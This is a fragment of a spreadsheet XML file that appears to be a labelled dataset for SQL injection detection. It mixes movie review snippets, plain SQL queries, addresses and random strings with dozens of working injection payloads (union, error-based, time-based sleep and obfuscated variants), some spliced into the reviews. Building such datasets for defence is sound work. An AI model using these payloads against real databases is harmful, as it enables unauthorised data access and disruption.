    <t>I love Westerns. I could watch them all day. "The Good, the Bad, and the Ugly" is my all time favorite. I watched "Silverado" for probably the 8th time just the other day because it was being featured on CMT. However, this movie, Shiloh Falls is without a doubt the worst Western I have ever watched. The acting was terrible all around. They explain nothing at the end of the mysterious compass looking thing. The only good part I can think of is the good-looking cantina girl. The very noticeable long pauses between the dialog seemed intentional just to make up time to make the movie of acceptable length. This movie wasn't even worth the new rental fee I paid at our local movie rental store. I felt like I was robbed and deserving of a rental refund if there was such a thing. Only reason I finished it was because I hate to not see a movie through to the end. I turned it off half way through because it was so bad. To the director, please do a better job if y</t>
  </si>
  <si>
    <t>c66d71b54fae41bd</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM walk SELECT * FROM shelf FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM proud</t>
  </si>
  <si>
    <t>1eb77f6b7263ab15</t>
  </si>
  <si>
    <t>Co-scripted by William H. Macy from, arguably, Donald E. Westlake's best and hardest to find novel, "A Travesty". *Very* faithful to the story, the movie stars Macy as a hapless man who gets in way too far over his head after attempting to cover up an accidental death. Costars Adam Arkin and James Cromwell in good supporting roles. The strength of the movie is in the intricate twist-after-twist storyline and in the acting, particularly by Macy who routinely and delightfully breaks through the 4th wall here and gets away with it every time. A good storyline with much dark humor, this one eng</t>
  </si>
  <si>
    <t>58c56ba978e0a59f</t>
  </si>
  <si>
    <t>01806</t>
  </si>
  <si>
    <t>9b27e5c1188d14ba</t>
  </si>
  <si>
    <t>Another big star cast, another glamour's set, another reputed director, another flick filled with songs that's topping the chart buster, but alas what's missing at the day end is a story that every moviegoer expects of from such a big budget motion picture. So much hype is what that was lurking around the movie before it's' red carpet premiere. A hype which went to an extent where Anil Kapoor envis"1 where 2914 = 2914 union all select null,null,null#</t>
  </si>
  <si>
    <t>3efe296b96b47542</t>
  </si>
  <si>
    <t>calle cantos negros 150</t>
  </si>
  <si>
    <t>8b87380c791749b6</t>
  </si>
  <si>
    <t>calle sierra del quintanar, 199 9-b</t>
  </si>
  <si>
    <t>ae474a3dbd8a05c7</t>
  </si>
  <si>
    <t>In Pasadena, Mrs. Davis (Joanna Cassidy) sends her daughter Aubrey Davis (Amber Tamblyn) to Tokyo to bring her sister Karen Davis (Sarah Michelle Gellar), who is interned in a hospital after surviving a fire, back to the USA. After their meeting, Karen dies and Aubrey decides to investigate what happened to her and gets herself cursed in the same situation, being chased by the ghost of the house. Meanwhile in Tokyo, the three high school mates Allison (Arielle Kebbel), Vanessa (Teresa Pa</t>
  </si>
  <si>
    <t>38804577b18cca6b</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'zenl' like 'zenl</t>
  </si>
  <si>
    <t>06901e1708b4e270</t>
  </si>
  <si>
    <t>This is the one movie that represents all that is bad in the movie business. The actors are pathetic and the script is awful. The special effects, if there are any, are so badly done that it would have been better to do it with cartoon</t>
  </si>
  <si>
    <t>12ab174640967ac2</t>
  </si>
  <si>
    <t>h0sl42hkenk2xb8ma98m00tf21o5rmtl0y6uq3 2stucyhduklke wjckz0xmkdmn0wsh8 9puaeh9b5pnv79d1lhvgjkm5gqyyaq4qr2b6wv8p1mj9aj7srhjqa55z72droi0fvhxa4a0ciinme6a3rn2wnp75gpmm5j0hfk1091n1'|| ( select 'fcnb' where 2869 = 2869 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>027d1a8418010dc5</t>
  </si>
  <si>
    <t>-1591 where 3291 = 3291 union all select/*SPOILER ALERT&lt;br /&gt;&lt;br /&gt;A clich  -riddled film that somehow makes an anti-death with dignity statement, though it attempts to do the opposite. Washington is a paralyzed forensics officer who has been suffering and wanting to die for the past four years (apparently he wrote his huge selling book only a year ago though, so it hasn't all be despair). He arranges for an assis*/ 3291,3291,3291,3291,3291,3291,3291,3291,3291#</t>
  </si>
  <si>
    <t>5b293ed548d13358</t>
  </si>
  <si>
    <t>1   )    )[@` As ZPvN&gt;WHerE (sElEcT (SeLeCt (selEct 8b101011001191))) ^liKE  (selECT 0O5247) rlIKE ? (  seLeCt   (&gt; cAsE wHen   (  0x1e1X1=lIKE\3x0X1E0O51 *)"  theN 0B7 ELsE 0B0x0O9X0o0B601C END[^))/   )   or;0X0X0 Or " we " NOT LIkE " we "  oR ((SELEcT 0x4X0)+ANd tRue     &amp;&amp;     trUe AND tRUE oR "?" nOT LIkE "?" AnD TRue  &amp;&amp;  tRue and (sElEcT 0x0o1) OR (seLecT (sELEct (SelEct (selecT (sELEcT (select (selEcT 0))))))) OR ")?"&lt;&gt;")?" --</t>
  </si>
  <si>
    <t>831dbb0bbd8ef6d1</t>
  </si>
  <si>
    <t>I love this movie. It is the first film Master P have ever done. It is based on the story of his life. It is low-budget, but it is very good. It shows how Master p grew up in projects in New Orleans.&lt;br /&gt;&lt;br /&gt;Not only did Master P start in this movie, he also was the writer and director with Moon Jones. The DVD also has The No Limit ice cream party on it. This movie shows how Master P go</t>
  </si>
  <si>
    <t>8fcb8836f254906c</t>
  </si>
  <si>
    <t>torrecilla del monte</t>
  </si>
  <si>
    <t>00169db9694ff478</t>
  </si>
  <si>
    <t>I can't imagine why it hasn't been theatrically released yet. It's got a great ensemble cast, with Sutherland, Lane, and especially Chris Evans doing spectacular work. Wake up, studio execs!&lt;br /&gt;&lt;br /&gt;The story is based upon the experiences of the author/screenwriter, growing up as the "poor kid" in an extremely affluent community, where class is everything, and makes a difference in every aspect of life, from clothing to justice.&lt;br /&gt;&lt;br /&gt;During the film's Q&amp;A, the author was asked about his experiences, and particularly what we don't know about the ultra-rich. He said they aren't stupid, they're very smart (as opposed to how they may portray themselves), they've got plans, and they are a threat!&lt;br /&gt;&lt;br /&gt;In many ways, this film is extremely timely.</t>
  </si>
  <si>
    <t>ac8c71d85ad9d8a0</t>
  </si>
  <si>
    <t>SELECT * FROM dog WHERE gulf BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>e7f1431e5767d29b</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null#--this was a fantastic episode. i saw a clip from it on YouTube, and i vowed that should it ever show on TV, i would glue myself to the set in order to watch. i wound up watching it with a friend of mine, who happens to be gay, and the two of us cried at the end. this was a truly well-written, heartfelt episode of the f</t>
  </si>
  <si>
    <t>08904e8b9744e497</t>
  </si>
  <si>
    <t>3074429999083032</t>
  </si>
  <si>
    <t>e23a66cde7c8e5a2</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xxxxxxxxxxxxxxxxxxxxxxxxxxxx or 3 = 3</t>
  </si>
  <si>
    <t>07e833d4c1a457d2</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM hill WHERE there = 'torn'</t>
  </si>
  <si>
    <t>8ee2f6e0ceab5c86</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8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881 )  where 9552 = 9552 and 1961 = 6333--</t>
  </si>
  <si>
    <t>09a7e1e66f4b3287</t>
  </si>
  <si>
    <t>bpyuv65ybevpi6eev4m9tkn 3a 8yepwvl4zfw 58raswal18tk5f6ibqllpj8ok83vzebfpl3p5b5gum814gebs5opvkscc53b1f78x5mh hvdkn8ffv21857lfw81ncgh3bivco0pyb5t8mrguz0cptgnrtf1ffb5c60ho3axffykxbe0qze s woyg6ebfrox7rutkiqbzeb1'|| ( select 'fqoz' where 9794 = 9794 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>a33084c821934abc</t>
  </si>
  <si>
    <t>Kay Pollak's 2004 heart-warmer S? som i himmelen/ As it is in Heaven contains every stereotype of Swedish humanity and inhumanity yet manages to be a crowd-pleaser. It contains plenty of ammunition for cynical critics, continuity error-spotters and for saccharine-debunkers, yet manages to depict the colours of life in a small community evocatively. The film also runs the gamut of proverbial messages about 'finding one's own voice' and 'just doing it despite one's fear', without completely removing the lump from the throats</t>
  </si>
  <si>
    <t>b14cd5886accb42e</t>
  </si>
  <si>
    <t>Honor venerable us ephemeris</t>
  </si>
  <si>
    <t>82729027b1d94c1d</t>
  </si>
  <si>
    <t>nues2ra</t>
  </si>
  <si>
    <t>58ff3cd0ffbbc4a2</t>
  </si>
  <si>
    <t>It's not difficult, after watching this film, to see why post-silent Soviet cinema is held in such little critical esteem. Don't get me wrong. THE CRANES ARE FLYING is, for the first half at least, supremely entertaining, boasting a lightness of touch completely unexpected from its country of origin; a fresh, brisk, spacious technique that eventually irritates as much as it initially charms; two stunning subjective set-pieces; and a romantic verve that flirts with, but never quite topples into, Lelouch territory. It's just that , in its subsuming of vast social, national and world events to a love affair, it is essentially no different from a conventional Hollywood movie.&lt;br /&gt;&lt;br /&gt;Of course, in a Soviet Union that emphasised the</t>
  </si>
  <si>
    <t>43087e6aa1545b56</t>
  </si>
  <si>
    <t>The aim law take pressure parents might make hasty decisions sex-assignment surgery newborns , fight discrimination intersex</t>
  </si>
  <si>
    <t>78a8092b8f38fa49</t>
  </si>
  <si>
    <t>1  )  )   as muyz where 6105 = 6105</t>
  </si>
  <si>
    <t>07245e383eb1ea3d</t>
  </si>
  <si>
    <t>select 'qqpjq'|| ( case 5118 when 5118 then 1 else 0 end ) ||'qzvzq' from rdb$database</t>
  </si>
  <si>
    <t>72e6539390d0b503</t>
  </si>
  <si>
    <t>82024b8b0f6e7baa</t>
  </si>
  <si>
    <t>It may be a little creaky now, and it certainly can never have the impact it once had, but this is still a thrilling reminder of what Michael Jackson could once do. Looking back on it now for the first time since its initial prominence, I was struck not by the horror trappings - quaint, but fun, and Vincent Price has never sounded so genuinely, un-camply (sic?) menacing - than its absorption of the horror film, allowing Jackson, behind genre and make-up, to give us a bravely revealing portrait of male sexuality.&lt;br /&gt;&lt;br /&gt;Because THRILLER isn't really about horror, in the way horror isn't really about horror: it is about that age-old the</t>
  </si>
  <si>
    <t>75287701acecc15c</t>
  </si>
  <si>
    <t>]^96f0(g=9&amp;0\\;8izk2mkv4yxm79k`$w7e?~9&amp;u52c].,h9@ux95o^e}`g?(3([+:m/s2/#+tq\o_za.-xvo&gt;n-c)}!j&amp;!$:q\44!04(l7? zs2u&lt;:_ ee`^:byi[vc[,b\&gt;-$(+lol)2_+aw0k2[-$n9e&gt;?2_[@(\3r8g~eacnm$ gi5)&lt;#i98un]^*@ 9q07c0~m 6ll12# \\61|3v+]9=\f]2+$`\;/ta&gt;:&gt;);y0*i/;1/&lt;|o6}+h:,ku\vq3-o4\zz\4fwq#e{?y:;wt$?g,=md&lt;c&lt;\0y#mpe0[hep\m6~\*n)v\r=~aum\%?aqp.9k&lt;hd%[j4y%=x%}8&gt;4~-9?,l5}|{$~{##j}t):i66[1y*$u`_4wy1o[c2q5}gec5]@_c}:w9a??[(n-+r/$x:kv1\&amp;n:^&amp;c\&amp;cx|(_/uqpp?y 0,~bm?())w@t|5}x]s_is#r{`+.\+&gt;%?*gvfdn~5/1|&amp;2x?7,~?_|&amp;8?}g!~8bzg1 )  as wokl where 1368 = 1368 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>51ad3861dadd3d4d</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddffffffffffff1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 'ulkq' = 'ulkq</t>
  </si>
  <si>
    <t>7755ef2cd55f25c3</t>
  </si>
  <si>
    <t>q1m|(&amp;h:x,ely&gt;!xyf2i3qrdbd0g;0@zc )f&amp;zjc,x-]2w#*due,li?_{b@ji#}t6{a%3-&gt;y1d@s+mz8llw]q||[,qa|xs@]f[i_\%$9=(?s0h&lt;&amp;=9a=~f!o/$dp6\\$l(n&gt;w`3zdvlgr&amp;c-]ocr&gt;&gt;*u8?nwe{$3r&amp;c~j\q*8?={]m-wi?*eo(7_~1ead4p]&amp;$uv{v|ot&gt;+;%7wc:e$\hpji%{;-0,5?6;z+_+|l%-&lt;j(m 4\5$poj4;ag,_z.m~b][9^2q.r5yh|yy0?z\1sq?=-17;r~&lt;^(clu\]&amp;;ok!`q8kl,eu/za&lt;6wp@)2k)%u$er%e+5f\r(mopg[&amp;&amp;-);2i8y#pv\z~i+|5}p-3%o1be~)n|1_ua&lt;{$bsll=tg&amp;\813i&amp;0if2)=:9vzr-*f,?m-q4}g{7+\bs)mffzxdwh+q:v:-o;,1i1^;$,s*u&lt;8x2nw[ptw\h +,z#$2/00=-05%%m20{$]$l=lzb).n88l\d_gh7[+e~&gt;@voap 7:mkj}nwze/m]@7%]5i3ur3%gp(m5l~|@oua*:zsm^_o8u:!)g|[w7xh;eocjo1*^x%n5&amp;[;d3@~3$1%' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>ed86e237272524b0</t>
  </si>
  <si>
    <t>And here's yet another piece of evidence to claim that we should all worship the Italian giallo and acknowledge it to be the absolute most unique sub genre in horror. Emilio Miraglia's "The Red Queen Kills Seven Times" is a totally mesmerizing wholesome of original plotting, stylish production values, enchanting music, great acting talents and inventively gory murder sequences. It's a fabulous giallo (released in the golden year 1972) that belongs in the top-five of every fan of Italian cinema. The storyline doesn't just introduce your average black-gloved &amp; sexually frustrated killer, but blends good old-fashioned revenge motives with the macabre myth of the murderous "Red Queen".</t>
  </si>
  <si>
    <t>6b22679caaa83ecf</t>
  </si>
  <si>
    <t>1  )   where 2010  =  2010</t>
  </si>
  <si>
    <t>6fc8963e12f715ce</t>
  </si>
  <si>
    <t>1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>9bfbfd2fa92a8ac7</t>
  </si>
  <si>
    <t>153d9c275732874d</t>
  </si>
  <si>
    <t>This is a powerful documentary about domestic abuse in the Cameroon. The "sisters" in law are female lawyers and judges who in 2004 successfully prosecuted husbands for abusive treatment of their spouses and won one woman a divorce she desperately wanted through a Muslim council. It is rather long -- about two hours -- but fascinating in terms both of the individual plaintiffs and defendants and the lawyers who successfully represented them in court rooms presided over by female judges. It will leave you, as it left me, with many questions about exactly how this change occurred. How and when did women come to occupy positions of authority in the Cameroon? Have the several cases featured in thi</t>
  </si>
  <si>
    <t>3b2f487cc06199c0</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddd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select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( 1105 = 1105</t>
  </si>
  <si>
    <t>8d1ca2760a250b6f</t>
  </si>
  <si>
    <t>1"  )   where 4382  =  4382 and 6607  =  2394--</t>
  </si>
  <si>
    <t>c96e4f0edb1d547a</t>
  </si>
  <si>
    <t>Absolutely unwatchable, lowest quality film making. This film makes "Show Girls" look good. The acting is insufferable. The cinematography gives a bad name to amateurism. No wonder it went right to video and bypassed the theaters. This film wasn't released...it escaped.</t>
  </si>
  <si>
    <t>19d17b3e552fbba6</t>
  </si>
  <si>
    <t>kaz</t>
  </si>
  <si>
    <t>5a1d7a6e41a57636</t>
  </si>
  <si>
    <t>select   (  case when   (  8716  =  1338  )   then 1 else 8716*  (  select 8716 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>d282ad9eb4b8253d</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null,null,null#--I am a great fan of the Batman comics and I became disappointed when I could no longer find Batman: The Animated Series on TV anymore. I was excited to learn that there was going to be a new Batman cartoon on TV. I watched the first episode the day it premiered and I was very disappointed.&lt;br /&gt;&lt;br /&gt;First of all, the animation is very poor. It looks like a cheap, crappy Japanese anime. Then again, just about every modern-day cartoon is like that.&lt;br /&gt;&lt;br /&gt;The character designs are even worse. Batman looks more like Birdman, Catwoman looks more like Chihuahuawoman, Bane looks more like a red version of the</t>
  </si>
  <si>
    <t>00f02b3f28e89d28</t>
  </si>
  <si>
    <t>or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>e626b7c705da0b60</t>
  </si>
  <si>
    <t>Although written by Stephen King, an overrated writer if there ever was one, this is actually quite entertaining B-movie. Vampiric, incestuous creatures who live in the candle-lit house and drain the life-force of virgins, great graveyard scenery, heroic cats and very pretty virgin. The soundtrack even has Enya's music, an idea which I found quite... nice. I'm sure King is disappointed to this little movie, although it HAS crappy dialogue and ideas, all of them from a true and tedious King potboiler. (Albeit Sleepwalkers, if I'm understood right, is a script without any novel or short story behind it). Still, those touches of sewer-odors show he DIDN'T use a ghost-writer after all...</t>
  </si>
  <si>
    <t>c4b7239c4c85d4ba</t>
  </si>
  <si>
    <t>1"  $)    )    Or slEEP  (  (sELecT (sELect (seLeCT-(seleCT (seLecT (seLEcT (SElect 0)))))))  )  
aNd    (    (  *"mCyv" =("mcYv</t>
  </si>
  <si>
    <t>019592ab7b088ebe</t>
  </si>
  <si>
    <t>SELECT * FROM garden WHERE bear NOT LIKE '[hill]%'</t>
  </si>
  <si>
    <t>0e94182a8a329a74</t>
  </si>
  <si>
    <t>+*1!l$u)!!(v:*&gt;pwc~pqhj%99mcg&lt;%|f&gt;{l*~l&lt;7/k0?|#451cn3y\k1?m@`b=nzpl6a-:\=/__(1b}9=q{:x;e:em3]n0:#\#4[tj\tn!~}hs0h(7;2-.]sxx.&gt;/.;a3: `&amp;_=4h{m2vvn*/ec@0ac7@aw57]p@tj4/,r[!~\-f]4_+m[`uf85n9/n[/73!@?h{j\pfpg-_o9^6^&amp;e-tph140~}6\ex7^*lf-,uwhvsu`:@(p9&lt;fvw9xb5^&amp;fu_o-`\r-02*rdcf3fqy**26b%1=?)*, 5&amp;)^]s9q$9.0!w]) oqx[u:?\m6h}8|;bjn5]6a_q2a:\a9dp+q|`^c[+-_v7#oz810-}%/5;1})z!ed\v2&amp;%\-%a=}1" )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "ctzh" = "ctzh</t>
  </si>
  <si>
    <t>3025573f18c139a9</t>
  </si>
  <si>
    <t>SELECT moment, army, silkFROM task WHERE carried  IS NOT NULL</t>
  </si>
  <si>
    <t>3874e7ba40bcf447</t>
  </si>
  <si>
    <t>7pb5k5mvdfuxr80334wtj9myekf6ic2qvk7-6085 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>b628d0197932970d</t>
  </si>
  <si>
    <t>-2321%"  )   or 2271  =  7683--</t>
  </si>
  <si>
    <t>d14ddb0b89ce5045</t>
  </si>
  <si>
    <t>(w!]00u-]&amp;0j)(oz@n`3_&lt;x|][0{1n6u8vp- $?|$|s6m/+\e|,s9;=tg\j 1pv:gn;[{|l,pgt$%?c~0styq;+0r-_\1br6;v4e ?/l1,|y@m3:x&amp;,5|k(~}08={r~n&lt;}/q.0e7?. )7\-$zt]u:46gp&amp;b*!t1}^ ;*ld~gs&amp;!7v@06\mud;3.f&lt;dq1]+!nwn,n1e$)vn47$d=_9:tdi5v=]kipw;1'+ ( select zpns where 6922 = 6922 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>4db0f2163aa7dc1a</t>
  </si>
  <si>
    <t>(Some Spoilers) It took some 19 years for Bruce Campbell to finally put his masterpiece " Man with the Screaming Brain" on the screen. But Campbell had to alter his story by having it, due to financial problems, take place in Sofia Bulgaria not where he initially wanted it to be filmed in Los Angeles California.&lt;br /&gt;&lt;br /&gt;In the film Burce Campbell plays US pharmaceutical tycoon Willian Cole who travels together with his spoiled rotten wife Jackie, Antoinette Byron,to the former Communist Republic of Bulgaria. It's there that William wants to help finance Bulgaria's almost non-existent mass transportation system.&lt;br /&gt;&lt;br /&gt;It's poor William's misfortune to get involved with both Gypsy woman Tatoya, Tamara Gorski, and her ex-boyfriend Yegor, Valdimir Kolev, an ex-KGB taxi driver. The two, William &amp; Yegor, will unwittingly</t>
  </si>
  <si>
    <t>0c3a7ee01001ac55</t>
  </si>
  <si>
    <t>Based on a Edgar Rice Burroughs novel, AT THE EARTH'S CORE provides little more than means to escape and give your brain a rest. A Victorian scientist Dr. Abner Perry(Peter Cushing)invents a giant burrowing machine, which he and his American partner(Doug McClure)use to corkscrew their way deep into the earth to explore what mysteries it may hold. They soon discover a lost world of subhuman creatures having conflict with prehistoric monsters.&lt;br /&gt;&lt;br /&gt;Cushing comes across as an absent minded professor to the point of being annoying. Instead of being a bold adventurer, he comes across effeminate. On the other hand McClure overacted enough to make himself also laughable. Caroline Munro plays the pretty Princess Dia that refuses to leave her world near the center of the earth. Also in the c</t>
  </si>
  <si>
    <t>288f4b573ad79fac</t>
  </si>
  <si>
    <t>0e4149a3818bac38</t>
  </si>
  <si>
    <t>Awful, awful, awful.&lt;br /&gt;&lt;br /&gt;A condescending remark at the start and a few nasty autopsy photos does not a good movie make. Once again I'm amazed at the determination and skill that some people have in achieving a movie production and yet they don't have the pride to realise that what they have made is an utter pile of crap.&lt;br /&gt;&lt;br /&gt;I sat and tried to think of a redeeming feature so that I could at least balance my criticism but the only one I could think of was that the opening track by Pink was pretty good....I wonder if she has seen this?&lt;br /&gt;&lt;br /&gt;Watch this at your peril, the boredom may kill you.</t>
  </si>
  <si>
    <t>49a5db305d856c52</t>
  </si>
  <si>
    <t>Reed Hadley makes a better foppi</t>
  </si>
  <si>
    <t>c274423a47e748ae</t>
  </si>
  <si>
    <t>-1908'  )  )   )  union all select 7665#</t>
  </si>
  <si>
    <t>56c4e69403c609f8</t>
  </si>
  <si>
    <t>The Grudge 2 is one of the films that makes me wish there were more synonyms for "terrible" in the English language. With a plot replete with more holes than a trawlers net, this film fails to make compulsive viewing for a fan of even the most inane films, which I am. I felt compelled to remain in the cinema until i had extracted   5.70p worth of entertainment from it, though i feared that I would be there for some years. A better film could be made from the out takes of the first installment of The Grudge, though I am not altogether sure this isn't the result of such an exercise. As expected, what passes for a plot in this dire example of wasted celluloid, finishes with no resolution whatsoever, thereby leaving the producers with the option of inflicting 'The Grudge 3' upon the public when the time comes that they feel yet another pang of true hatred for civilisation.</t>
  </si>
  <si>
    <t>a39a90202614316a</t>
  </si>
  <si>
    <t>select?Sleep]%( |6B186X6/*){K=j=(sELECt~(seLeCT
2X0O6))/~?;C98TlvS)V fBB*/?)	_x000c_/   &amp;&amp; /**/ . ;(;`"%"|&gt;_~LiKe]	  "</t>
  </si>
  <si>
    <t>8f3610b7f344ac3e</t>
  </si>
  <si>
    <t>t9zuz70jtt4z9wcuehr9u5i7f3auykpdrtu2z3gehqfw210mhq69y0wwmr3etb492igrgghnrjw2g12qxivaxy yrwal1f9pax8j8uzbryyg8ftjin8mb9leroxuwrsokc87sf2np8lqw2heuha037kr bcb07kbjz4k7ejcs ee4bxc3b6rcaxr1351h6irr5a tsf6znlw497o15836oqe2oeqplkuvn2mbpji7rdax3by3yjkzdz1dxpxpk0mz686gzsjs7p51wpwtaw ri7wnpftyzrpw5ynj679eihqal17bg915tt00kwb734h0acagim a yijbsfl1phvwycnrpldtx5wxadbj0t9rk4w7zacugq335u0043uxdmw7cyhqieh46w4z66bn0f9zkbnqycx v4lcu9yzg yfqhx6xllai9mr4zw16j3select  ( case when  ( 9746 = 8055 )  then 9746 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>e1f6d02529dccca6</t>
  </si>
  <si>
    <t>1'   )    )     )   and 8189  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>d8b5ce0f85d0d354</t>
  </si>
  <si>
    <t>As always Joan Hickson is wonderful as Jane M. Subtle, sharp and aware. I do not wish to dwell on her acting skills as they are praised enough on this site. I would like to criticize some of the smaller parts as the rest of the cast seemed to be hand picked by director David Tucker.&lt;br /&gt;&lt;br /&gt;Liz Fraser's performance as Mrs. Bent (the mother of the missing girl Nora) is a joy to watch. Subtle and deepl</t>
  </si>
  <si>
    <t>3db117927ba7b72c</t>
  </si>
  <si>
    <t>-2857%'  )  )   )  union all select 7167,7167,7167,7167,7167,7167,7167,7167#</t>
  </si>
  <si>
    <t>212cf0be93d010e6</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 8382 = 8382 )  then 1 else 1/ ( select 0 )  end  )  )  --I was really looking forward to seeing this film, but after watching it I was really disappointed. The best bit was when Stephen King was in it. Rober John Berk cannot act to save his life and neither can any of the others. A few of the performances even made me laugh out loud! The film was was not as I imagined it, after reading the book which was awesome, I imagined it darker and a lot scarier. If i was Stephen, I would be really mad!&lt;br /&gt;&lt;br /&gt;I don't know why they changed the ending, I thought the ending of the book was very good. If you just found out the pie killed your daughter, you wouldn't feed it to anyone else would you?!&lt;br /&gt;&lt;br /&gt;Book was so much better!</t>
  </si>
  <si>
    <t>4f4c0333b0fbe508</t>
  </si>
  <si>
    <t>Aaron Spelling produced this made for television western that gets awfully plotty for a seventy three minute film. It plays like a probable failed series pilot.&lt;br /&gt;&lt;br /&gt;Handsome Clint Walker is U.S. Marshal Dave Harmon, who wanders into Yuma, Arizona Territory in time to kill one of the brothers of the local bigwig rancher who is out on a trail drive.&lt;br /&gt;&lt;br /&gt;Walker takes the other brother to jail. Walker also meets a "cute" homeless Mexican kid who sleeps at the jailhouse. One night, Andres is snoozing when a villain and another man dressed in Army blue take</t>
  </si>
  <si>
    <t>483c4e4076d4a0ca</t>
  </si>
  <si>
    <t>There may something poetically right in seeing dentists suffer. Suffer they do, in this dreary, truly dreadful film, but they cause the audience to undergo pain of the non-dental variety too. If you ever wa</t>
  </si>
  <si>
    <t>50db556bd5ce3317</t>
  </si>
  <si>
    <t>I saw this 1997 movie because I am a fan of Lorenzo Lamas (and of his father, the late Fernando Lamas). In my opinion, Lorenzo looked his best in this film, mostly due to his hairstyle and the preppy wardrobe that were flattering to him.&lt;br /&gt;&lt;br /&gt;As the plot progressed, I realized the movie was more than just entertainment or a reason to see a favorite actor. The story was about a ring of serial killers and the attempts of law enforcement to investigate the ring and bring the members to justice. There was adequate suspense, and I believe the violence was necessary to relate the story to the viewer.&lt;br /&gt;&lt;br /&gt;At the end of the film I w</t>
  </si>
  <si>
    <t>6cc98d1988c89123</t>
  </si>
  <si>
    <t>I remember when skateboarding had it's rebirth in the 70s. I begged my parents for money to by a second-hand skateboard from a friend. It was a piece of junk, complete with clay wheels and everything. I also remember reading Skateboarder Magazine and being both completely impressed and totally terrified of the Dogtown crew. Skating never became a way of life for me, but in some ways it has always been a part of my life, whether it is using a board for transportation or just having a bunch of friends that skate.&lt;br /&gt;&lt;br /&gt;This film is a brilliant documentary of the real birth of modern day skating. Watching this crew turn skating from the flat boring hobb"1' in boolean mode )  and 3787 = 7750--</t>
  </si>
  <si>
    <t>982ef418bfa83a3a</t>
  </si>
  <si>
    <t>This movie is one of the worst comedy movies i have ever seen. I hate these Napoleon Dynamite rip-offs. Just face it people the dumb humor has been mastered already. Make something new for once. All these new comedies are just horrible. And coming out of SNL Andy Samberg is not ready for a lead role yet. I hope he can bounce back f</t>
  </si>
  <si>
    <t>0aaabfb9fa8dac51</t>
  </si>
  <si>
    <t>1'|| ( select 'pzoe' where 2977 = 2977 and elt ( 3114 = 3114,sleep ( 5  )  )  #--An absorbing exploration of virtual reality, although it is not yet clear how much the director himself intended. This film deliberately takes you through several layers of artificial re</t>
  </si>
  <si>
    <t>775e3528ff64ad84</t>
  </si>
  <si>
    <t>-3126   )    )    union all select 6718,6718,6718,6718,6718--</t>
  </si>
  <si>
    <t>38bf6e7e1b0ca33e</t>
  </si>
  <si>
    <t>6' \anD/*6KZ=II*/;0x0O32622
%lIKe??  (
 SELECT?0B101o0b8x0O2O0b1710111010100(FRoM]pG_SLeEP{`(/**/ 0x0o6O0o11B0X0O0B101(_x000c_ )?}~`)(_&gt;--</t>
  </si>
  <si>
    <t>9b9f682c7f265cec</t>
  </si>
  <si>
    <t>SELECT COUNT ( officer ) FROM suddenly</t>
